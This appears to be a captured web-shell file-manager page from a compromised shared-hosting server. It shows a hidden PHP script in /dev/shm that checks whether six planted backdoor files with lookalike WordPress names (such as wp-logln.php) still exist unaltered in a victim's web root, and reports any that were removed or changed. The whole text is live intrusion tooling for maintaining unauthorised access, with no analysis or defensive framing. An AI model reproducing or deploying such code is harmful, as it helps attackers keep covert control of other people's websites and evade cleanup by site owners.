HEX
Server: LiteSpeed
System: Linux server65.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: msatrvvp (1709)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //dev/shm/.fac
<?php   $r = '/home/n2sysadmin/public_html'; $x = ["/test1.php"=>"bd@@114281@@49",
"/savep.php"=>"bd@@114239@@38",
"/phocagalleryf.php"=>"bd@@114044@@98",
"/imdex.php"=>"bd@@114336@@15",
"/wp-logln.php"=>"bd@@99860@@7817",
"/wp-logim.php"=>"bd@@114108@@62"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');